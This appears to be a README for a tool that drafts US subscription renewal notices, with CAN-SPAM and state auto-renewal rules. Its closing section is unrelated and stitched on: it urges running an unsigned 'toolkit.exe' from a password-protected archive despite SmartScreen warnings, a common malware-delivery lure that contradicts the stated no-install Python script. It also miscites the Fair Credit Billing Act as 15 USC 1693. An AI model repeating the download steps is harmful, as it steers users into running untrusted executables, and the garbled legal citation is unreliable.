Subscription Renewal Notices

Drafts US subscription renewal notices with the amount, the date, the auto-renewal terms and the way to cancel, then checks the email rules. Written for US subscription businesses and SaaS teams handling renewals and cancellations.

The job

Renewal notices go out as a receipt with no warning that the price changes, so cancellations spike and refund requests follow.

What you get

1. Collect the current price, the renewal date, the new amount and what is changing.
2. Write the notice: what renews, when, at what price and what the customer must do to change or cancel.
3. Check the message against the CAN-SPAM elements and the auto-renewal rules in the customer's state.
4. File the notice date, the amount and the exact copy with the account record.

Output contract:

• notice - the email body with the date, the amount and the change stated
• subject_lines - plain and accurate subjects with no fake prefix
• cancellation_path - the steps a customer takes to stop the renewal
• compliance_notes - the elements present and the state rules to check

US specifics that matter

• A renewal notice that promotes a commercial offer is commercial email under CAN-SPAM, so it needs truthful headers, a physical postal address and a working opt-out.
• California's Automatic Renewal Law requires a reminder before an automatic renewal and an annual notice for auto-renewing consumer contracts, and other states have similar statutes.
• The Fair Credit Billing Act at 15 USC 1693 requires a written billing-error notice, and card network rules generally require an acknowledgment within 30 days of a dispute.
• Under ESIGN and the UETA, a customer who consented to electronic records and notices can receive the renewal notice by email.
• Opt-outs on commercial email must be honored within 10 business days.

Guardrails (hard rules)

• Never send the notice; the billing system and a person deliver it.
• Never state a renewal amount or a price change that the billing system does not show.
• Never replace the cancellation path with a retention offer only.
• Never guess the customer's state when the auto-renewal rule depends on it.

Quickstart

1. Fill in the brief

templates/renewal-notice.yaml is the starting point. Copy it, fill in your own numbers, and keep the field names - the script reads them by name.

2. Run the script

python3 scripts/calc_renewal.py --input renewal-notice.yaml --out ./out

The script is standalone: Python 3 standard library only, no install step, no network calls, no API keys.

3. Check the result against the reference

references/renewal-notice-rules.md holds the limits, the US rules and the checklist the output has to satisfy. Read it before you send anything to a customer or a platform.

What the notice must say

• What is renewing, the amount in USD and the renewal date.
• The price change, the new amount and the effective date, if there is one.
• How to change or cancel, and the deadline that still counts.
• Where to get help, with a real support contact.

Email rules

• Truthful From, To and Reply-To headers, and an accurate subject line.
• The sender's physical postal address and a working opt-out.
• Opt-outs are honored within 10 business days.
• One notice per message: no fake receipt, no fake account alert.

State by state

• California requires a pre-renewal reminder and an annual notice for auto-renewing consumer contracts.
• New York and other states with automatic renewal statutes set their own notice language and timing.
• Check the customer's state before sending; last year's notice may not be compliant today.
• Keep a record of the notice and the delivery date for the customer's state.

Check the download before you run it. PowerShell:

The hash must match the value in the table. Then extract the archive and start multitool/toolkit.exe.

The program is not code-signed, so Windows SmartScreen shows Unknown publisher. Run it only if you accept an unsigned program, keep it in a folder of its own, and do not run it as administrator unless you have a reason to.

The installer asks for a password; ask the publisher for it before you start.
